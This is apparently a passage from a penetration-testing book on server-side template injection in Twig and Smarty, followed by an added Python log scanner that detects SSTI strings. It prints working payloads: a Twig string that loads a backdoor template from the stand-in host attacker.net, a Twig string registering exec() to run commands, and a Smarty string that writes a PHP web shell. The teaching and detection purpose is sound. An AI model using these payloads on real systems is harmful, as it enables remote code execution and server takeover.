Using Burp Suite to exploit the vulnerability

Imagine you have an application vulnerable to SSTI that is using Twig. Twig (https://twig.symfony.com/) is a template engine developed in PHP.

We can detect which engine is in use from the source code, because each engine has its own delimiter syntax. Consider the following code snippet:

var greet = 'Hello $name';
<ul>
<% for(var i=0; i<data.length; i++) { %>
  <li><%= data[i] %></li>
<% } %>
</ul>
<div>
  <p> Welcome, {{ username }} </p>
</div>

Here, we can see that the application expects data to be supplied at render time in order to build the final page for the user. When PHP renders the template, it evaluates every expression contained in it, which is why template syntax supplied by a user is dangerous. For example, in 2015, James Kettle published a vulnerability that allows a backdoor to be injected into Twig using the following string:

{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} 

Following the same idea, it is possible to execute any command, even obtaining a shell, using the following string:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 
uid=1000(k) gid=1000(k) groups=1000(k),10(wheel) 

This happens because the injected string can name any PHP function, and the code invokes it without validation. Kettle pointed to the responsible source code, shown in the following:

public function getFilter($name) {
    [snip]
    // every registered callback is invoked with the filter name as its argument
    foreach ($this->filterCallbacks as $callback) {
        if (false !== $filter = call_user_func($callback, $name)) {
            return $filter;
        }
    }

    return false;
}

public function registerUndefinedFilterCallback($callable) {
    $this->filterCallbacks[] = $callable;
}

Basically, the code invokes whatever callable was registered, with no restriction on which PHP function it may be, so in the string Kettle registered exec() as the callback and had it run a command directly on the server.

Twig is not the only engine with problems. The other engines researched by Kettle included Smarty, another PHP engine, which in theory disallows the direct use of the system() function. However, Kettle discovered that it still allows invoking methods of other classes.

The vulnerable code snippet is shown in the following screenshot:

In this snippet of code, we can see that the getStreamVariable() method could be abused to read any file the server process has permission to read. Furthermore, other methods can be called.

So, to execute a command on the server, Kettle showed the following testing string:

{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}

Here, the command is supplied through the cmd parameter of the $_GET array.

In Burp Suite, we can add these testing strings for the different template engines as a payload list and then launch the attack using the payload options of the Intruder tool, as shown in the following screenshot:
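As an added example that is not from the book, the following Python script shows the defensive counterpart of the Intruder run: it scans web-server access log lines (constructed samples, not real traffic) for the Twig and Smarty testing strings discussed above, URL-decoding each request target before matching. The log format, indicator list and field names are assumptions for this example.

```python
import re
from urllib.parse import unquote_plus

# Strings taken from the Twig and Smarty testing strings discussed above
# (constructed indicator list for this example; extend it for other engines).
SSTI_INDICATORS = {
    "twig": [r"_self\.env\.", r"registerUndefinedFilterCallback",
             r"setCache\s*\(", r"loadTemplate\s*\("],
    "smarty": [r"Smarty_Internal_Write_File", r"getStreamVariable",
               r"self::clearConfig"],
}
INDICATOR_RE = {engine: re.compile("|".join(p), re.IGNORECASE)
                for engine, p in SSTI_INDICATORS.items()}

# Combined-format access log: we only need client IP, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_target(target: str) -> str:
    """URL-decode twice so a payload encoded by Burp and again by a proxy still matches."""
    return unquote_plus(unquote_plus(target))

def classify(line: str):
    """Return a finding dict for a log line carrying a known SSTI string, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    engines = [e for e, rx in INDICATOR_RE.items() if rx.search(decoded)]
    if not engines:
        return None
    return {"ip": m.group("ip"), "engines": engines,
            "status": m.group("status"), "target": decoded}

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (not real traffic): the first carries the Twig string from
# this section, the second the Smarty string with its PHP body replaced by "x", both
# URL-encoded as Intruder would send them; the third is a benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /profile?name=%7B%7B_self.env.registerUndefinedFilterCallback%28%22exec%22%29%7D%7D%7B%7B_self.env.getFilter%28%22id%22%29%7D%7D HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /profile?name=%7BSmarty_Internal_Write_File%3A%3AwriteFile%28%24SCRIPT_NAME%2C%22x%22%2Cself%3A%3AclearConfig%28%29%29%7D HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /profile?name=Alice HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["engines"]} {hit["target"]}')
```

A 200 response to a request matching these strings deserves a closer look than a 500, since it may mean the template rendered the injected expression.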
